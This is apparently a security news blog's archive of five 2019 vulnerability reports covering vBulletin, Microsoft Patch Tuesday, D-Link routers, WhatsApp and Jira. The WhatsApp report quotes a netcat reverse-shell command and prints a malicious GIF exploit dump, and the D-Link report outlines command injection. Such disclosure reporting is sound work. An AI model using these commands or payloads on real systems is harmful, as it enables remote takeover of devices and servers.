Category Archives: rce

vBulletin addresses three new high-severity vulnerabilities

vBulletin has recently published a new security patch update that addresses three high-severity vulnerabilities in the popular forum software.

vBulletin has recently published a new security patch update that addresses three high-severity flaws in vBulletin 5.5.4 and prior versions.

The vulnerabilities could be exploited by remote attackers to take complete control over targeted web servers and steal sensitive user information.

The first vulnerability, tracked as CVE-2019-17132, is a remote code execution flaw reported by security researcher Egidio Romano.

The vulnerability resides in the way vBulletin forum handles user requests to update avatars for their profiles, a remote attacker could exploit it to inject and execute arbitrary PHP code on the target server through unsanitized parameters. The vulnerability could not be triggered in the default installation of the vBulletin forum.

“User input passed through the “data[extension]” and “data[filedata]” parameters to the “ajax/api/user/updateAvatar” endpoint is not properly validated before being used to update users’ avatars. This can be exploited to inject and execute arbitrary PHP code.” reads the security advisory. “Successful exploitation of this vulnerability requires the “Save Avatars as Files” option to be enabled (disabled by default).”

Proof of code is available at the following URL:

http://karmainsecurity.com/pocs/CVE-2019-17132

The remaining critical vulnerabilities addressed by vBulletin are two SQL injection issues, both tracked as CVE-2019-17271.

“1) User input passed through keys of the “where” parameter to the “ajax/api/hook/getHookList” endpoint is not properly validated before being used in an SQL query. This can be exploited to e.g. read sensitive data from the database through in-band SQL injection attacks. Successful exploitation of this vulnerability requires an user account with the “canadminproducts” or “canadminstyles” permission.” reads the security advisory.

2) User input passed through keys of the “where” parameter to the “ajax/api/widget/getWidgetList” endpoint is not properly validated before being used in an SQL query. This can be exploited to e.g. read sensitive data from the database through time-based SQL injection attacks. Successful exploitation of this vulnerability requires an user account with the “canusesitebuilder” permission.

The two vulnerabilities could allow administrators with restricted privileges to read sensitive data from the database.

Romano reported all the flaws to the vBulletin maintainers on September 30 that released the following security patch updates.

Last month, vBulletin released a patch for a critical zero-day remote code execution vulnerability.

Pierluigi Paganini

(SecurityAffairs – vBulletin, hacking)

The post vBulletin addresses three new high-severity vulnerabilities appeared first on Security Affairs.

MS October 2019 Patch Tuesday updates address 59 flaws

Microsoft October 2019 Patch Tuesday addressed a total of 59 vulnerabilities. 9 of which are rated as critical and 49 as important.

The tech giant released its October 2019 Patch Tuesday security updates to address a total of 59 vulnerabilities in Windows operating systems and other software, 9 of which are rated as ‘critical’, 49 are ‘important’, and one ‘moderate’.

None of the vulnerabilities addressed by Microsoft was exploited by attackers in the wild or was publicly known.

Microsoft addressed two critical remote code execution flaws, tracked as CVE-2019-1238 and CVE-2019-1239, in the VBScript engine, both tie the way VBScript handles objects in memory. An attacker could exploit the flaw to cause memory corruption and execute arbitrary code in the context of the current user.

An attacker could trigger the flaws by tricking the victims into visiting a specially crafted website through Internet Explorer.

The attacker could also exploit these flaws using an application or Microsoft Office document that embeds an ActiveX control marked ‘safe for initialization’ that leverages the Internet Explorer rendering engine.

Microsoft addressed three critical memory corruption flaws in the Chakra scripting engine that could lead to remote code execution. The vulnerabilities affect the way Chakra scripting engine handles objects in memory in Microsoft Edge.

Microsoft has addressed a reverse RDP attack, an attacker could exploit the flaw to compromise client computers connecting to a malicious RDP server by exploiting a critical remote code execution issue in Windows built-in Remote Desktop Client application.

The attack scenario sees threat actors tricking victims into connecting to a malicious RDP server.

October 2019 Patch Tuesday security updates also addressed two NTLM authentication vulnerabilities, tracked as CVE 2019-1166 and CVE-2019-1338 that could be exploited by attackers to bypass the MIC (Message Integrity Code) protection on NTLM authentication.

“A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features.” reads the security advisory for the CVE 2019-1166.

“To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature.”

The full list of vulnerabilities addressed with the release of October 2019 Patch Tuesday updates is available here.

Pierluigi Paganini

(SecurityAffairs – October 2019 Patch Tuesday updates, hacking)

The post MS October 2019 Patch Tuesday updates address 59 flaws appeared first on Security Affairs.

D-Link router models affected by remote code execution issue that will not be fixed

Researchers at Fortinet’s FortiGuard Labs have publicly disclosed a critical remote code execution vulnerability affecting some models of D-Link routers. 

Security experts at Fortinet’s FortiGuard Labs disclosed a remote code execution vulnerability tracked as CVE-2019-16920. The vulnerability is an unauthenticated command injection issue that was discovered on September 2019. The flaw has received a CVSS v31 base score of 9.8 and a CVSS v20 base score of 10.0. 

The bad news for the users is that the vendor will not address it because it affects discontinued products.  

According to the Fortinet, the vulnerability impacts D-Link firmware in the DIR-655, DIR-866L, DIR-652, and DHP-1565 router families.

D-Link router

“In September 2019, Fortinet’s FortiGuard Labs discovered and reported an unauthenticated command injection vulnerability (FG-VD-19-117/CVE-2019-16920) in D-Link products that could lead to Remote Code Execution (RCE) upon successful exploitation. We rated this as a critical issue since the vulnerability can be triggered remotely without authentication.” reads the security advisory published by Fortinet.

The vulnerability could be exploited by an attacker sending arbitrary input to a “PingTest” gateway interface to achieve command injection.

“The vulnerability begins with a bad authentication check. To see the problem in action, we start at the admin page and then perform a login action.” continues the advisory. “Here, we implement the POST HTTP Request to “apply_sec.cgi” with the action ping_test. We then perform the command injection in ping_ipaddr. Even if it returns the login page, the action ping_test is still performed – the value of ping_ipaddr will execute the “echo 1234” command in the router server and then send the result back to our server. “

The experts discovered that it is possible to execute code remotely, even without the necessary privileges, due to bad authentication check.

The researchers reported the vulnerability to D-Link on September 22, the vendor the day after acknowledged the issue, but three days later confirmed that no patch will be released because the products are at End of Life (EOL),

Below the disclosure timeline:

  • 22 September, 2019: FortiGuard Labs reported the vulnerability to D-Link.
  • 23 September, 2019: D-Link confirmed the vulnerability
  • 25 September, 2019: D-Link confirmed these products are EOL
  • 3 October 2019: Public disclosure of the issue and released advisory

Pierluigi Paganini

(SecurityAffairs – routers, hacking)

The post D-Link router models affected by remote code execution issue that will not be fixed appeared first on Security Affairs.

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Researcher discovered a double-free vulnerability in WhatsApp for Android that could be exploited by remote attackers to execute arbitrary code on the vulnerable device.

A security researcher that goes online with the moniker Awakened discovered a double-free vulnerability in WhatsApp for Android and demonstrated how to leverage on it to remotely execute arbitrary code on the target device.

The expert reported the issue to Facebook that acknowledged and addressed the flaw with the release of WhatsApp version 2.19.244.

The expert discovered that the flaw resides in the DDGifSlurp in decoding.c in libpl_droidsonroids_gif .so library used to generate the preview of the GIF file when a user opens Gallery view in the popular messaging application to send a media file,

“When the WhatsApp Gallery is opened, the said GIF file triggers the double-free bug on rasterBits buffer with size sizeof(GifInfo). Interestingly, in WhatsApp Gallery, a GIF file is parsed twice. When the said GIF file is parsed again, another GifInfo object is created.” reads a technical analysis published by the expert. “Because of the double-free behavior in Android, GifInfo info object and info->rasterBits will point to the same address. DDGifSlurp() will then decode the first frame to info->rasterBits buffer, thus overwriting info and its rewindFunction(), which is called right at the end of DDGifSlurp() function.”

The expert was able to craft a GIF file to control the PC register, then he successfully achieved remote code execution by executing the following command:

system("toybox nc 192.168.2.72 4444 | sh");

The expert highlighted that it was not possible to point to system() function in libc.so, instead, it was necessary to first let PC jumps to an intermediate gadget.

we need an information disclosure vulnerability that gives us the base address of libc.so and libhwui.so. That vulnerability is not in the scope of this blogpost.” continues the expert. ” Note that the address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.”

The expert developed the code that was able to generate a corrupted GIF file that could exploit the vulnerability.

notroot@osboxes:~/Desktop/gif$ gcc -o exploit egif_lib.c exploit.c
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

Then he copied the content into a GIF file and send it as Document with WhatsApp to another WhatsApp user. The researcher explained that the crafted GIF file could not be sent as a Media file, because WhatsApp attempts to convert it into an MP4 before to send it. The vulnerability will be triggered when the target user that has received the malicous GIF file will open WhatsApp Gallery to send a media file to his friend.

Below the attack vectors devised by the expert:

  1. Local privilege escaltion (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in WhatsApp context. This allows the malware app to steal files in WhatsApp sandbox including message database.
  2. Remote code execution: Pairing with an application that has an remote memory information disclosure vulnerability (e.g. browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send it to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker). When the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in WhatsApp context.

The exploit works for WhatsApp version 2.19.230 and prior versions, the company addressed it with the release of the version 2.19.244

The exploit works for Android 8.1 and 9.0, but the expert explained that it does not work for Android 8.0 and below.

“In the older Android versions, double-free could still be triggered. However, because of the calls by the system after the double-free, the app just crashes before reaching to the point that we could control the PC register.” concludes the expert.

Pierluigi Paganini

(SecurityAffairs – WhatsApp, hacking)

The post Expert disclosed details of remote code execution flaw in Whatsapp for Android appeared first on Security Affairs.

Critical flaws affect Jira Service Desk and Jira Service Desk Data Center

Atlassian released security updates for Jira Service Desk and Jira Service Desk Data Center to address a critical flaw that can lead to information disclosure

Atlassian released security updates to address critical vulnerabilities in Jira Service Desk and Jira Service Desk Data Center. One of the flaw can lead to information disclosure, while another critical vulnerability addressed by Atlassian could allow server-side template injection leading to remote code execution. The Jira Service Desk is a help desk request tracker brought to you by Atlassian that allows companies to easily receive, track, manage, and resolve requests from your team’s customers.

Jira Service Desk

The first vulnerability affecting Service Desk and Service Desk Data Center is a URL path traversal.

The flaw, tracked as CVE-2019-14994, could lead to information disclosure, it could be exploited by anyone with access to the portal, including customers. The vulnerability has been discovered by the security researcher Sam Curry.

“Affected JIRA Service Desk versions in CVE-2019-14994 will allow non-application access users – Service Desk Customers to path traverse to see restricted issues in the JIRA instance.” reads the security advisory published by Atlassian.

“This allows Service Desk Customers who normally don’t have access to tickets that are not their own to view details of tickets contained in the XML generated results in all JIRA Service Desk projects.”

An attacker could exploit the flaw to view all issues within all Jira projects contained in the vulnerable installation, including Service Desk projects, Jira Core projects, and Jira Software projects.

The security researchers Satnam Narang of Tenable reported that tens of thousands of installs are exposed online, the IT ticketing application is widely adopted in several sectors including the healthcare, government, education and manufacturing industry.

“According to the advisory, an attacker with access to the web portal can send a specially crafted request to the Jira Service Desk portal to bypass these restrictions and view protected information. In order to exploit the vulnerability, the Customer Permissions settings for who can raise a request must be set to “Anyone can email the service desk or raise a request in the portal,” which may be a common configuration because the other two options limit who can open requests.” reported Tenable. “In addition to viewing protected information within Jira Service Desk, an attacker could also view protected information from Jira Software and Jira Core if the “Browse Project” permission is set to Group – Anyone.”

The vulnerability affect product versions prior 3.9.16, from 3.10.0 before 3.16.8, from 4.0.0 before 4.1.3, from 4.2.0 before 4.2.5, from 4.3.0 before 4.3.4, and version 4.4.0. 

The following versions of Service Desk Server and Service Desk Data Center address the CVE-2019-14994: 3.9.16, 3.16.8, 4.1.3, 4.2.5, 4.3.4, and 4.4.1.

A possible workaround consists of blocking requests to JIRA containing ‘..’ at the reverse proxy or load balance level, or configure JIRA to redirect requests containing ‘..’ to a safe URL. Admins could add the following rule to the “URLwrite” section of “[jira-installation-directory]/atlassian-jira/WEB-INF/urlrewrite.xml”:

<rule>
    <from>^/[^?]*\.\..*$</from>
    <to type="temporary-redirect">/</to>
</rule>

The second critical flaw addressed by Atlassian is a Template injection issue in Jira Importers Plugin.

The flaw tracked as CVE-2019-15001 affects version 7.0.10 of Jira Server and Jira Data Center and it could be exploited by remote attackers in the administrators’ group to execute arbitrary code.

“There was a server-side template injection vulnerability in Jira Server and Data Center, in the Jira Importers Plugin (JIM). An attacker with “JIRA Administrators” access can exploit this issue. Successful exploitation of this issue allows an attacker to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center.” reads the security advisory.

The vulnerability was reported by the researcher Daniil Dimitriev, it affects versions of the product start from 7.0.10 and include the following:

  • from 7.0.10 before 7.6.16 (fixed in 7.6.16)
  • from 7.7.0 before 7.13.8 (fixed in 7.13.8)
  • from 8.0.0 before 8.1.3 (fixed in 8.1.3)
  • from 8.2.0 before 8.2.5 (fixed in 8.2.5)
  • from 8.3.0 before 8.3.4 (fixed in 8.3.4) 
  • from 8.4.0 before 8.4.1 (fixed in 8.4.1)

Pierluigi Paganini

(SecurityAffairs – Jira, hacking)


The post Critical flaws affect Jira Service Desk and Jira Service Desk Data Center appeared first on Security Affairs.